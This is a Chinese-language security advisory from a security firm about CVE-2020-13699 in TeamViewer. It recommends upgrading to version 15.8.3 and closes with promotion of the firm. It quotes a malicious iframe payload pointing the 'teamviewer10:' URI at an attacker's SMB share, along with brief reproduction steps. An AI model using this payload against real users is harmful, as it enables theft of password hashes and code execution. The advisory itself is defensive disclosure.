近日,TeamViewer 官方發布了 TeamViewer 用戶密碼破解漏洞 的風險通告,漏洞概況如下:
CVE編號
CVE-2020-13699風險等級高危TeamViewer是一款可以隨時隨地連接到遠程桌面電腦、行動裝置及Iot,讓遠程連接過程更加的快速和安全,輕鬆實現對文件、網絡及程序的實時支持或訪問的遠程連接控制軟體。
TeamViewer多個版本中存在 用戶密碼破解漏洞,攻擊者通過讓被攻擊者點擊精心構造的嵌入惡意iframe(iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')的網頁,以啟動TeamViewer Windows桌面客戶端並打開一個遠程SMB共享,即可轉發該請求(使用類似響應者)以執行代碼(或捕獲以進行哈希破解)。
復現過程
1.構造嵌入惡意iframe的頁面。
2.訪問惡意頁面,即可啟動TeamViewer。
雁行安全團隊建議TeamViewer用戶及時對受影響版本的TeamViewer進行升級。
升級至最新版本 15.8.3,下載連結如下:
https://www.teamviewer.com/en/download/previous-versions/https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448https://nvd.nist.gov/vuln/detail/CVE-2020-13699
如需應急支持,請聯繫雁行安全團隊。
應急響應聯繫電話:400-029-4789 【轉2】
雁行安全團隊
專注於為客戶提供網絡信息化安全服務
西安四葉草安全雁行安全團隊,以攻防技術作為核心競爭力,集紅隊攻防、漏洞挖掘、安全服務為一體,擁有10餘年安全服務經驗,4100+安全服務項目經驗,服務項目涵蓋了政府、金融、運營商、衛計、交通、企業、網際網路等多個行業,通過將來自一線的經驗變成用戶所需要的安全服務,從而保障客戶相關重要系統和資源的安全,有效地減少用戶單位由於安全問題引起的不可估量的損失。